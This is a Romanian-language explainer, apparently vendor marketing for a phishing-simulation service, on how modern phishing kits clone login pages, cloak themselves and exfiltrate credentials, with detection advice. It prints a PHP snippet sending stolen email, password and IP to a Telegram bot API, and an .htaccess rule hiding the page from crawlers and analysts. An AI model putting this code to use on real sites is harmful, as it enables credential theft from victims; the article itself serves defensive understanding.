Anatomia unui kit de phishing modern
Un „kit de phishing” este baza de cod împachetată și reutilizabilă pe care atacatorii o desfășoară pentru a clona o pagină de autentificare, a recolta credențiale și a le exfiltra. Înțelegerea felului în care sunt construite aceste kituri — și a modului în care se ascund — face mult mai ușoară detectarea din timp a campaniilor și construirea unor simulări defensive convingătoare.
Ce conține un kit
Un kit tipic este o arhivă ZIP depusă pe o gazdă compromisă sau pe găzduire ieftină. Structura sa este remarcabil de constantă:
kit/
├── index.php # pagina de destinație clonată
├── login.php # tratarea formularului: captează + redirecționează credențialele
├── assets/ # copii fidele ale CSS, JS, siglelor, fonturilor
├── config.php # ținta de exfiltrare (e-mail, bot Telegram, URL la distanță)
├── antibots.php # liste de blocare pentru crawlere, sandbox-uri, cercetători
└── .htaccess # rescrieri, filtrare geo/IP, protecție hotlink
Kiturile moderne sunt tot mai des vândute „ca serviciu” (PhaaS — Phishing-as-a-Service), cu tablouri de bord pe abonament, actualizări și suport.
Clona
Pagina de destinație este de obicei o copie octet cu octet a unui ecran de autentificare real, captată cu un „aspirator” de site sau cu un browser headless. Două indicii sunt frecvente:
- URL-uri absolute ale resurselor care încă trimit către CDN-ul legitim (astfel pagina încarcă sigle reale, în timp ce formularul trimite către atacator).
- Un
<form>al căruiactionțintește un handler PHP local în loc de endpointul real al mărcii.
Kiturile avansate fac proxy către site-ul real în timp real (un montaj adversary-in-the-middle cu unelte precum Evilginx), transmițând ce tastează victima către serverul autentic și furând cookie-ul de sesiune rezultat — ceea ce învinge cele mai multe MFA.
Stratul anti-analiză
Componenta antibots este cea care ține un kit în viață. Filtrează vizitatorii înainte de a servi pagina de phishing:
- Filtrare după user-agent și ASN — blochează crawlerele cunoscute și intervalele IP ale Google, Microsoft, furnizorilor de securitate și sandbox-urilor din cloud.
- Verificări de referer și geo — servește pagina doar țintelor din țara așteptată, redirecționând restul către site-ul legitim.
- Limitarea ratei și linkuri de unică folosință — un token în URL care se arde după o singură vizită, astfel încât o mostră redirecționată afișează un 404 inofensiv.
# extras din .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]
De aceea un URL care unui analist SOC „îi pare mort” era pe deplin activ pentru victimă cu câteva minute înainte.
Captarea și exfiltrarea credențialelor
Handlerul validează exact cât să pară real, apoi expediază datele. Canale de exfiltrare, aproximativ în ordinea popularității:
- SMTP / mail() către o cutie poștală scrisă în cod.
- API-ul boturilor Telegram — un apel
sendMessagecătre un token de bot, ieftin și rezistent. - POST către un URL de C2 sau un webhook Discord.
- Fișier de jurnal local pe care operatorul îl adună mai târziu.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");
Observați redirecționarea finală: după „autentificarea eșuată”, victima ajunge pe site-ul real, presupune o greșeală de tastare, se autentifică cu succes și nu bănuiește nimic.
Găzduire și livrare
Kiturile preferă infrastructura de unică folosință: site-uri WordPress compromise, redirecționări deschise pe domenii de încredere, domenii asemănătoare abia înregistrate și, tot mai des, servicii legitime (Cloudflare Workers, IPFS, SharePoint, Google Docs) pentru a le împrumuta reputația. Livrarea împerechează kitul cu o momeală — o factură, o „reverificare” MFA, o notificare de document partajat.
Detecție defensivă
Semnale care merită vânate:
- Domenii abia înregistrate asemănătoare mărcii dumneavoastră (monitorizați jurnalele CT și typosquat-urile).
- Hashing de favicon și DOM — kiturile reutilizează exact resursele mărcii clonate.
- Apeluri de ieșire către Telegram / webhook de la gazde web care nu au motiv să le facă.
- Trimiterea credențialelor către origini neașteptate în telemetria browserului.
- Rapoarte agregate DMARC care dezvăluie încercări de falsificare împotriva domeniului dumneavoastră.
Adevărul incomod: un kit AiTM bine construit învinge MFA prin SMS și prin aplicație furând tokenul de sesiune. Metodele rezistente la phishing — FIDO2 / passkey — sunt soluția durabilă.
Cum ajută GottaPhish
Kiturile de phishing moderne transformă în armă clonele fidele și furtul de sesiune AiTM, care înving chiar și MFA prin SMS și prin aplicație. GottaPhish și echipa sa de experți vă ajută să faceți față exact acestei amenințări: simulări sigure și complet auditate care reproduc kituri reale — linkuri cu token, fluxuri de captare a credențialelor, scenarii AiTM — cu tablouri de bord care arată ce momeli prind și unde rezistă MFA. Specialiștii noștri sprijină configurarea, concep scenarii care reproduc meșteșugul actual PhaaS și vă ajută să interpretați rezultatele ca instruire țintită și ca semnale concrete de inginerie a detecției pentru SOC-ul dumneavoastră.
